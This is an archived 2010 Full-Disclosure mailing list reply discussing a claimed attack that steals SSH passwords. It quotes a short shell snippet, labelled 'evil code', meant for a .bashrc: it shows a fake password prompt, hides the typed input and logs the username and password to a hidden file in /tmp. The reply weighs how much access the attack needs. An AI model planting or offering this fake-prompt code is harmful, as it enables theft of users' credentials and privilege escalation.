| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20100602194128.GC25798@polymnia.joachimschipper.nl> Date: Wed, 2 Jun 2010 21:41:28 +0200 From: Joachim Schipper <joachim@...chimschipper.nl> To: full-disclosure@...ts.grok.org.uk Subject: Re: PuTTY private key passphrase stealing attack On Wed, Jun 02, 2010 at 01:29:40PM +0530, rapper crazy wrote: > all controls like MOTD can be bypassed ... > > =========edited script===== > # evil code > mIP=`/sbin/ifconfig | grep x.x.x | cut -d ':' -f2- | cut -d ' ' -f1` > mUn=`whoami` > mSttyVal=`stty -g` > echo -en "Permission denied, please try again.\n" > echo -en "$mUn@...P's password:" > stty -echo > read password > echo -en "username: $mUn \t\t password: $password\n" >>/tmp/.log > echo -en "\n" > stty $mSttyVal > ==================end snippet======== > > > Apart from this, we already need to have root access to replace any .bashrc > file ... this is not really an attack but a social engineering attack .... > if we had root access we could attach sshd to the strace and get any > password etc all details .... But note that someone with access to a single account could use this to gain the password for that account, and hence possibly sudo access. It's a bit of a stretch, but not impossible. Joachim _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists